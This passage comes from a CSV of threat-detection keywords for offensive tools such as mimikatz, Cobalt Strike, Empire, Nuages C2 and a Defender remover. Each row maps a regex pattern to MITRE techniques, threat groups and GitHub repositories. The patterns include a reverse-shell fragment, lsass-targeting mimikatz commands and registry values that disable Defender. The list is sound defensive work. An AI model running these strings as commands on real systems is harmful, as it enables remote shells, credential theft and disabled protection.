tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","3775" "* x11-access.nse*",".{0,1000}\sx11\-access\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3776" "* xdmcp-discover.nse*",".{0,1000}\sxdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3777" "* xmlrpc-methods.nse*",".{0,1000}\sxmlrpc\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3778" "* xmpp-brute.nse*",".{0,1000}\sxmpp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3779" "* xmpp-info.nse*",".{0,1000}\sxmpp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3780" "* xpipe*",".{0,1000}\sxpipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P 
- Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","0","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","3782" "* XRulez.cpp*",".{0,1000}\sXRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","3783" "* Xworm v*",".{0,1000}XWorm\s(V|v)\d+\.\d+.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","3784" "* You need to have an elevated context to dump other users' Kerberos tickets :(*",".{0,1000}\sYou\sneed\sto\shave\san\selevated\scontext\sto\sdump\sother\susers\'\sKerberos\stickets\s\:\(.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","3785" "* Your payload has been delivered*",".{0,1000}\sYour\spayload\shas\sbeen\sdelivered.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3786" "* -z burplog*",".{0,1000}\s\-z\sburplog.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3787" "* zsh ddexec.sh*",".{0,1000}\szsh\sddexec\.sh.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","3793" "*! This is a sample loader for Lastenzug*",".{0,1000}!\sThis\sis\sa\ssample\sloader\sfor\sLastenzug.{0,1000}","offensive_tool_keyword","Lastenzug","Socks4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#content","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","3794" "*!! >> if you did this while in the root shell, the terminal will be messed up << !!*",".{0,1000}!!\s\>\>\sif\syou\sdid\sthis\swhile\sin\sthe\sroot\sshell,\sthe\sterminal\swill\sbe\smessed\sup\s\<\<\s!!.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","3795" "*!!! 
Are you sure you are running as the AD FS service account?*",".{0,1000}!!!\sAre\syou\ssure\syou\sare\srunning\sas\sthe\sAD\sFS\sservice\saccount\?.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","3796" "*!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!*",".{0,1000}!!!\sTHIS\sBACKDOOR\sREQUIRES\sFIREWALL\sEXCEPTION\s!!!.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","3797" "*!!!need more proxies!!!*",".{0,1000}!!!need\smore\sproxies!!!.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#content","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","3798" "*!] 
APC Injection via Syscalls failed!*",".{0,1000}!\]\sAPC\sInjection\svia\sSyscalls\sfailed!.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","3799" "*!autoruns *",".{0,1000}!autoruns\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3800" "*!files upload *",".{0,1000}!files\supload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3801" "*!handlers load *",".{0,1000}!handlers\sload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3802" "*!implants *",".{0,1000}!implants\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3803" "*!modules load *",".{0,1000}!modules\sload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - 
TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3804" "*!process 0 0 lsass.exe*",".{0,1000}!process\s0\s0\slsass\.exe.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","3805" "*!processprotect *lsass.exe*",".{0,1000}!processprotect\s.{0,1000}lsass\.exe.{0,1000}","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. 
command: !processprotect /process:lsass.exe /remove","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","3806" "*!put */tmp*",".{0,1000}!put\s.{0,1000}\/tmp.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3807" "*!tunnels --tcp*",".{0,1000}!tunnels\s\-\-tcp.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3808" "*!use *aes256_py*",".{0,1000}!use\s.{0,1000}aes256_py.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - 
TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3809" "*!use *reflected_assembly*",".{0,1000}!use\s.{0,1000}reflected_assembly.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3810" "*!wPkgPath!*!ak!*",".{0,1000}!wPkgPath!.{0,1000}!ak!.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","3811" "*""!!Something went wrong. 
Maybe Outlook is not running.""*",".{0,1000}\""!!Something\swent\swrong\.\sMaybe\sOutlook\sis\snot\srunning\.\"".{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#content","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","3812" "*""3R5L|q[m""*",".{0,1000}\""3R\5L\|q\[m\"".{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3815" "*""A La Vie, A L'Amour"" - Windows build *",".{0,1000}\""A\sLa\sVie,\sA\sL\'Amour\""\s\-\sWindows\sbuild\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - 
Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","3816" "*""Ace RAT v1.0""*",".{0,1000}\""Ace\sRAT\sv1\.0\"".{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3817" "*""active_wraith_clients""*",".{0,1000}\""active_wraith_clients\"".{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","3818" "*""ADWS request with ldapbase (*",".{0,1000}\""ADWS\srequest\swith\sldapbase\s\(.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","3819" "*""author"": ""@_EthicalChaos_""*",".{0,1000}\""author\""\:\s\""\@_EthicalChaos_\"".{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","3821" "*""bypass-clm""*",".{0,1000}\""bypass\-clm\"".{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","3823" "*""-c \""sh -i >& /dev/tcp/*",".{0,1000}\""\-c\s\\\""sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","3824" "*""Custom DLL's are fking awesome !""*",".{0,1000}\""Custom\sDLL\'s\sare\sfking\sawesome\s!\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3826" "*""DisableAntiSpyware""=dword:00000001*",".{0,1000}\""DisableAntiSpyware\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3827" "*""DisableAntiVirus""=dword:00000001*",".{0,1000}\""DisableAntiVirus\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3828" "*""DisableBehaviorMonitoring""=dword:00000001*",".{0,1000}\""DisableBehaviorMonitoring\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3829" "*""DisableOnAccessProtection""=dword:00000001*",".{0,1000}\""DisableOnAccessProtection\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3830" "*""DisableRealtimeMonitoring""=dword:00000001*",".{0,1000}\""DisableRealtimeMonitoring\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3831" 
"*""DisableScanOnRealtimeEnable""=dword:00000001*",".{0,1000}\""DisableScanOnRealtimeEnable\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3832" "*""DLL's are awesome ! Especially Exec in Rust""*",".{0,1000}\""DLL\'s\sare\sawesome\s!\sEspecially\sExec\sin\sRust\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3833" "*""Don't use this for evil, please""*",".{0,1000}\""Don\'t\suse\sthis\sfor\sevil,\splease\"".{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#content","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","3834" "*""dsdoskdosk837928hduijfh""*",".{0,1000}\""dsdoskdosk837928hduijfh\"".{0,1000}","offensive_tool_keyword","hidden-tear","open source 